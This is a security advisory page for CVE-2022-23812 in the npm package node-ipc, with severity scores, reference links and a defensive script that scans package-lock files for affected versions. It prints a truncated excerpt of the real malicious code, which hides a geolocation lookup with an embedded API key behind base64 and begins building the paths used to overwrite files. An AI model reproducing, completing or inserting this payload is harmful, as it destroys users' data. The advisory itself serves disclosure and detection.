CVE-2022-23812 Information
Description
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code that targets users with an IP address located in Russia or Belarus and overwrites their files with a heart emoji.

Note: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior.

Malicious Code:

Note: Don’t run it!

```js
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
  const t = Math.round(Math.random() * 4);
  if (t > 1) {
    return;
  }
  const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
  o.get(n.toString("utf8"), function (t) {
    t.on("data", function (t) {
      const n = Buffer.from("Li8=", "base64");
      const o = Buffer.from("Li4v", "base64");
      const r = Buffer.from("Li4vLi4v", "base64");
      const f = Buffer.from("Lw==", "base64");
      const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
      const e = Buffer.from(
```

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Reference
https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580
https://github.com/RIAEvangelist/node-ipc/issues/233
https://snyk.io/vuln/SNYK-JS-NODEIPC-2426370
https://github.com/RIAEvangelist/node-ipc/issues/236
https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
https://security.netapp.com/advisory/ntap-20220407-0005/
Attack Complexity
LOW
Privileges Required
NONE
User Interaction Required
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
Base Score
9.8
Base Severity
CRITICAL
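A lockfile check for the versions this advisory names, as an added example (not code from node-ipc or from this advisory page): it takes a parsed package-lock.json and reports node-ipc entries from 10.1.1 and before 10.1.3, node-ipc 11.0.0 or later, and any peacenotwar entry. The helper names and `SAMPLE_LOCK` are assumptions made for illustration.

```javascript
// Added example. Version ranges come from the advisory text; SAMPLE_LOCK is constructed.
// "10.1.2-beta" -> [10, 1, 2]; anything unparseable -> []
const parse = (v) => (/^(\d+)\.(\d+)\.(\d+)/.exec(String(v || "")) || []).slice(1).map(Number);
const cmp = (a, b) => a[0] - b[0] || a[1] - b[1] || a[2] - b[2];

function classify(name, version) {
  if (name === "peacenotwar") return "peacenotwar package present";
  if (name !== "node-ipc") return null;
  const v = parse(version);
  if (v.length !== 3) return "node-ipc with unparseable version, review manually";
  if (cmp(v, [10, 1, 1]) >= 0 && cmp(v, [10, 1, 3]) < 0)
    return "node-ipc from 10.1.1 and before 10.1.3 (malicious code in source)";
  if (cmp(v, [11, 0, 0]) >= 0) return "node-ipc 11.0.0 or later (imports peacenotwar)";
  return null;
}

function scanLockfile(lock) {
  const findings = [];
  const check = (name, version, where) => {
    const reason = classify(name, version);
    if (reason) findings.push({ name, version, where, reason });
  };
  if (lock.packages) { // lockfileVersion 2/3: flat map keyed by install path
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path === "") continue; // root project entry
      check(meta.name || path.split("node_modules/").pop(), meta.version, path);
    }
  } else { // lockfileVersion 1: nested "dependencies" tree
    const walk = (deps, trail) => {
      for (const [name, meta] of Object.entries(deps || {})) {
        check(name, meta.version, trail + name);
        walk(meta.dependencies, trail + name + " > ");
      }
    };
    walk(lock.dependencies, "");
  }
  return findings;
}

const SAMPLE_LOCK = { // constructed sample, not from a real project
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/node-ipc": { version: "10.1.2" },
    "node_modules/example-lib": { version: "1.3.0" },
    "node_modules/some-tool/node_modules/node-ipc": { version: "11.1.0" },
    "node_modules/peacenotwar": { version: "9.1.5" },
  },
};
```

For a real project, pass `JSON.parse(fs.readFileSync("package-lock.json", "utf8"))` to `scanLockfile`; nested paths in the findings show which dependency pulled the package in.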